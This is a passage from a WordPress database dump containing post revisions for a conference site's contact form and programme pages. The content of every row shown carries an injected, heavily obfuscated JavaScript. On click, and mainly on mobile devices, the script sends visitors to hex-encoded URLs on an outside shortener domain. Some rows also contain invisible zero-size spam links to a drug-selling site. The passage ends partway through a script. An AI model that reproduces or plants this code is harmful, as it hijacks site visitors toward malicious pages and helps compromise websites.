_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Contact Form','','inherit','closed','closed','','5364-revision-v1','','','2023-08-22 22:53:46','2023-08-22 22:53:46','',5364,'https://gsw2023.com/?p=5373',0,'revision','',0),
(5375,1,'2023-08-22 23:55:54','2023-08-22 23:55:54','[fluentform id=\"1\"]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Contact Form','','inherit','closed','closed','','5364-revision-v1','','','2023-08-22 23:55:54','2023-08-22 23:55:54','',5364,'https://gsw2023.com/?p=5375',0,'revision','',0),
(5376,1,'2023-08-23 07:51:18','2023-08-23 07:51:18','<p>[vc_row][vc_column][vc_column_text]</p>\n<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/G<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a><br />\n</span><span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a><br />\n</span>SW2023-Program-2023-08-13.doc.pdf\"][/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 07:51:18','2023-08-23 07:51:18','',5122,'https://gsw2023.com/?p=5376',0,'revision','',0),
(5377,1,'2023-08-23 08:14:21','2023-08-23 08:14:21','<p>[vc_row][vc_column][vc_column_text]</p>\r\n<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/G<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a><br />\r\n</span><span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a><br />\r\n</span>GSW2023-Program-2023-08-23.pdf\"][/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 